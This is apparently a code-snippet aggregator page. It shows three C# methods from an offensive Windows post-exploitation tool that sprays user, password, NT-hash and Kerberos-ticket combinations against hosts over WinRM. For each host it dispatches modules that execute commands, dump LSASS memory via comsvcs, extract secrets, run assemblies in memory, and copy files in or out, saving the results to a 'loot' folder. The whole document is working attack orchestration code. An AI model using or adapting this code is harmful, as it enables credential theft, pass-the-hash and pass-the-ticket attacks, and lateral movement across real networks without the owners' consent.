Esempio n. 1
0
 public static void WINRM(string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
 {
     foreach (string computername in computernames)
     {
         try
         {
             Console.WriteLine(String.Format("[*] Checking {0}", computername));
             if (!Misc.CheckHostPort(computername, 5985))
             {
                 Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                 Console.WriteLine();
                 continue;
             }
             if (module.Length == 0 || module.Contains("exec"))
             {
                 Wsman.CheckLocalAdmin(computername, moduleargument, flags);
             }
             else if (module.Contains("comsvcs"))
             {
                 Wsman.InvokeComSvcsLsassDump(computername);
             }
             else if (module.Contains("secrets") || module.Contains("secret"))
             {
                 Wsman.GetSecrets(computername);
             }
             else if (module.Contains("assembly"))
             {
                 Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
             }
             else if (module.Contains("download"))
             {
                 Wsman.CopyFile(computername, path, destination);
             }
             else if (module.Contains("upload"))
             {
                 Wsman.UploadFile(computername, path, destination);
             }
             Console.WriteLine("");
         }
         catch (Exception e)
         {
             Console.WriteLine("[-] {0}:5985 - {1}", computername, e.ToString());
         }
     }
 }
Esempio n. 2
0
 public static void StartJob <T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
 {
     string[] passwords;
     if (typeof(T) == typeof(NTHash))
     {
         passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
         foreach (string user in users)
         {
             foreach (string password in passwords)
             {
                 Console.WriteLine("------------------");
                 Console.WriteLine(string.Format("[*] User:   {0}", user));
                 Console.WriteLine(string.Format("[*] domain: {0}", domain));
                 Console.WriteLine(string.Format("[*] secret:   {0}", password));
                 Console.WriteLine();
                 SetThreadToken(user, domain, password);
                 foreach (string computername in computernames)
                 {
                     Console.WriteLine(String.Format("[*] Checking {0}", computername));
                     if (!Misc.CheckHostPort(computername, 5985))
                     {
                         Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                         Console.WriteLine();
                         continue;
                     }
                     if (!Directory.Exists(Path.Combine("loot", computername)))
                     {
                         Directory.CreateDirectory(Path.Combine("loot", computername));
                     }
                     if (module.Length == 0 || module.Contains("exec"))
                     {
                         Wsman.CheckLocalAdmin(computername, moduleargument, flags);
                     }
                     else if (module.Contains("comsvcs"))
                     {
                         Wsman.InvokeComSvcsLsassDump(computername);
                     }
                     else if (module.Contains("secrets") || module.Contains("secret"))
                     {
                         Wsman.GetSecrets(computername);
                     }
                     else if (module.Contains("assembly"))
                     {
                         Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
                     }
                     else if (module.Contains("download"))
                     {
                         Wsman.CopyFile(computername, path, destination);
                     }
                     Console.WriteLine("");
                 }
             }
         }
     }
     else if (typeof(T) == typeof(ClearText))
     {
         passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
         foreach (string user in users)
         {
             foreach (string password in passwords)
             {
                 Console.WriteLine("------------------");
                 Console.WriteLine(string.Format("[*] User:   {0}", user));
                 Console.WriteLine(string.Format("[*] domain: {0}", domain));
                 Console.WriteLine(string.Format("[*] secret: {0}", password));
                 Console.WriteLine();
                 using (new Impersonator.Impersonation(domain, user, password))
                 {
                     foreach (string computername in computernames)
                     {
                         Console.WriteLine(String.Format("[*] Checking {0}", computername));
                         if (!Misc.CheckHostPort(computername, 5985))
                         {
                             Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                             Console.WriteLine();
                             continue;
                         }
                         if (!Directory.Exists(Path.Combine("loot", computername)))
                         {
                             Directory.CreateDirectory(Path.Combine("loot", computername));
                         }
                         if (module.Length == 0 || module.Contains("exec"))
                         {
                             Wsman.CheckLocalAdmin(computername, moduleargument, flags);
                         }
                         else if (module.Contains("comsvcs"))
                         {
                             Wsman.InvokeComSvcsLsassDump(computername);
                         }
                         else if (module.Contains("secrets") || module.Contains("secret"))
                         {
                             Wsman.GetSecrets(computername);
                         }
                         else if (module.Contains("assembly"))
                         {
                             Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
                         }
                         else if (module.Contains("download"))
                         {
                             Wsman.CopyFile(computername, path, destination);
                         }
                         Console.WriteLine("");
                     }
                 }
             }
         }
     }
 }
Esempio n. 3
0
        public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
        {
            AToken.MakeToken("Fake", "Fake", "Fake");
            string ticketoutput;

            if (String.IsNullOrEmpty(ticket))
            {
                foreach (string user in users)
                {
                    var secrets = hashes.Length > 0 ? hashes : passwords;
                    foreach (string secret in secrets)
                    {
                        string hash;
                        if (passwords.Length > 0)
                        {
                            string salt = String.Format("{0}{1}", domain.ToUpper(), user);
                            hash = Crypto.KerberosPasswordHash(encType, secret, salt);
                        }
                        else
                        {
                            hash = secret;
                        }

                        Console.WriteLine("------------------");
                        Console.WriteLine(string.Format("[*] User:   {0}", user));
                        Console.WriteLine(string.Format("[*] domain: {0}", domain));
                        Console.WriteLine(string.Format("[*] secret: {0}", secret));
                        ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
                        if (ticketoutput.Contains("[+] Ticket successfully imported!"))
                        {
                            Console.WriteLine("[+] Ticket successfully imported!");
                        }
                        else
                        {
                            Console.WriteLine("[-] Could not request TGT");
                            continue;
                        }
                        //ticket debugging
                        //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
                        //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
                        Console.WriteLine();
                        foreach (string computername in computernames)
                        {
                            Console.WriteLine(String.Format("[*] Checking {0}", computername));
                            if (!Misc.CheckHostPort(computername, 5985))
                            {
                                Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
                                Console.WriteLine();
                                continue;
                            }
                            if (!Directory.Exists(Path.Combine("loot", computername)))
                            {
                                Directory.CreateDirectory(Path.Combine("loot", computername));
                            }
                            if (module.Length == 0 || module.Contains("exec"))
                            {
                                Wsman.CheckLocalAdmin(computername, moduleargument, flags);
                            }
                            else if (module.Contains("comsvcs"))
                            {
                                Wsman.InvokeComSvcsLsassDump(computername);
                            }
                            else if (module.Contains("secrets") || module.Contains("secret"))
                            {
                                Wsman.GetSecrets(computername);
                            }
                            else if (module.Contains("assembly"))
                            {
                                Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
                            }
                            else if (module.Contains("download"))
                            {
                                Wsman.CopyFile(computername, path, destination);
                            }
                            else if (module.Contains("upload"))
                            {
                                Wsman.UploadFile(computername, path, destination);
                            }
                            Console.WriteLine("");
                        }
                    }
                }
            }
            else
            {
                Console.WriteLine("------------------");
                Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
                ticketoutput = SecurityContext.ImportTicket(ticket);
                if (ticketoutput.Contains("[+] Ticket successfully imported!"))
                {
                    Console.WriteLine("[+] TGT imported successfully!");
                }
                else
                {
                    Console.WriteLine("[-] Could not import TGT");
                    return;
                }
                //ticket debugging
                //List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
                //LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
                Console.WriteLine();
                foreach (string computername in computernames)
                {
                    Console.WriteLine(String.Format("[*] Checking {0}", computername));
                    if (!Misc.CheckHostPort(computername, 5985))
                    {
                        Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags));
                        Console.WriteLine();
                        continue;
                    }
                    if (!Directory.Exists(Path.Combine("loot", computername)))
                    {
                        Directory.CreateDirectory(Path.Combine("loot", computername));
                    }
                    if (module.Length == 0 || module.Contains("exec"))
                    {
                        Wsman.CheckLocalAdmin(computername, moduleargument, flags);
                    }
                    else if (module.Contains("comsvcs"))
                    {
                        Wsman.InvokeComSvcsLsassDump(computername);
                    }
                    else if (module.Contains("secrets") || module.Contains("secret"))
                    {
                        Wsman.GetSecrets(computername);
                    }
                    else if (module.Contains("assembly"))
                    {
                        Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
                    }
                    else if (module.Contains("download"))
                    {
                        Wsman.CopyFile(computername, path, destination);
                    }
                    else if (module.Contains("upload"))
                    {
                        Wsman.UploadFile(computername, path, destination);
                    }
                    Console.WriteLine("");
                }
            }
            AToken.RevertFromToken();
        }